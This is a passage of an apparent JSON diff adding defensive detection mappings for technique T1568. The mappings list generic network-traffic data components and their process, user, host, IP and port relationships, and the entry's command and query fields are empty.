on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1568", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network 